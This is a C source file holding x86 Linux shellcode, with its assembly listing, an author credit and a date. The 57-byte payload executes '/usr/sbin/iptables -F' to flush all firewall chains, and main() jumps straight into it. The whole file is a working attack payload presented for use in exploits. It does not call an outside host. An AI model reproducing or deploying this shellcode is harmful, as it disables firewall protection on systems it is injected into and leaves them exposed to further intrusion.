/*
Shellc0de ... FLUSH all chains with /usr/sbin/iptables

--=[ ACTION: /usr/sbin/iptables -F
--=[ SIZE  : 57 bytes
--=[ AUTOR : nitrous@danitrous.org
--=[ DATE  : 23/12/2004

ASM:
.globl main
main:
        jmp     w00t
funky:
        popl    %ebx
        xorl    %edx,%edx
        movb    %dl,0x12(%ebx)
        movb    %dl,0x15(%ebx)
 
        movl    %ebx,0x16(%ebx)
        leal    0x13(%ebx),%esi
        movl    %esi,0x1a(%ebx)
        movl    %edx,0x1e(%ebx)
 
        leal    0x16(%ebx),%ecx
 
        pushl   $0xb
        popl    %eax
        int     $0x80
w00t:
        call    funky
        .string "/usr/sbin/iptablesX-F"
*/
char fuckiptables[]=
"\xeb\x1d\x5b\x31\xd2\x88\x53\x12\x88\x53\x15\x89\x5b\x16\x8d\x73"
"\x13\x89\x73\x1a\x89\x53\x1e\x8d\x4b\x16\x6a\x0b\x58\xcd\x80\xe8"
"\xde\xff\xff\xff/usr/sbin/iptablesX-F";

main()
{
	__asm__("call fuckiptables");
}

